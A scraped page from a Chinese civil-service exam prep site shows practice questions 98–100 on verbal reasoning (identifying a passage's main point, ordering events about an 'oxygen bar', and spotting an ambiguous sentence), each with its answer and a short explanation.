98 . 《大秦帝国》、《汉武大帝》、《雍正王朝》……一部部歌颂盛世之治的文艺作品引来无数目光,然而,那些极尽繁华的书写却难掩历史叙事的思想缺失。从政治文化视野看,“盛世情结”叙事往往过分认同人治文化与功利立场。这段文字意在说明( )。

 

A:历史叙事作品缺乏思想

 

B:“盛世情结”作品的价值局限

 

C:文艺作品应该抛开功利立场

 

D:歌颂盛世的作品需重新审视

 

答案:B。题目详解:本文的落脚点在转折词“然而”之后,“那些极尽繁华的书写却难掩历史叙事的思想缺失。从政治文化视野看,‘盛世情结’叙事往往过分认同人治文化与功利立场”有缺失,过分注重某些领域,这就对应局限性,因此选择B

 

99 . (1)投资开设“氧吧”(2)宣传吸氧有健脑作用(3)光顾“氧吧”客人日渐稀少(4)“氧吧”经营其他项目(5)吸氧后未见显著效果

 

A:1—2—3—5—4

 

B:5—2—1—4—3

 

C:2—5—1—3—4

 

D:1—2—5—3—4

 

答案:D。题目详解:通过观察本题涉及的5件事,可以确定应该先开“氧吧”,然后才会有客人光顾,光顾后发现吸氧并没有显著效果,所以到“氧吧”的人越来越少,对照选项,只有D符合此推理,再检查D的排序,确认其符合逻辑。故正确答案为D。

 

100 . 请找出下面四句话中表达有歧义的一句:( )。

 

A:姚总对中国工业机械化所走过的道路有许多感性知识

 

B:下岗职工在生活上的实际困难,我们应该予以重视

 

C:赵警司坚持秉公办事,不谋私利的事迹,在当地广为流传

 

D:大家热烈鼓掌,望着慰问团微笑着走进会场

 

答案:【答案】D。题目详解:这道题属于语意不明中的指代不明。选项D中“走进会场”有歧义,是“大家走进会场”还是“慰问团走进会场”。故正确答案为D。

 

< id="info_CommonContent" class="display_content"> < class="clear">
返回上一步
打印此页
< class="clear"> < class="inside_content"> < id="ct77114_LeftModule" class="m-item"> < class="iFCB-inside-title"> < class="title"> 更多 < class="title_more">资讯活动 < class="content"> < class="TTXW_LIST">
2021-10-29【今日时政】公务员考试时政热点(11.12)
2019-11-29公务员考试时政热点
2019-11-292020年国家公务员考试申论热点:营造孩子上网良好生态
2019-11-292020年国家公务员考试常识积累:挪用公款罪
2019-11-29申论积累:习大大用典——得人之要,必广其途以储之
2019-11-292019年3月第1周国内时政热点汇总
< class="clear"> < id="ct77108_LeftModule" class="m-item"> < class="iFCB-inside-title"> < class="title"> 更多 < class="title_more">师资力量 < class="content"> < class="iFCB-pro"> < class="bd"> < class="clear"> < class="main_bottom"> < class="main-btm"> < class="footer"> < class="ft-wrap"> < class="copyright">

安徽教育科技有限公司     

总部地址:

分校位于:江苏省、河南省、浙江省、广东省、广西省、福建省

服务热线: 

技术支持:

< style="width:300px;margin:0 auto;padding:20px 0;">

< class="online-qq-lx online-qq-right" >
< class="mbar-tip">
< class="mbar-tip">浏览手机站
< class='mbar-tip'>微信二维码
< class="mbar-tip">[向上]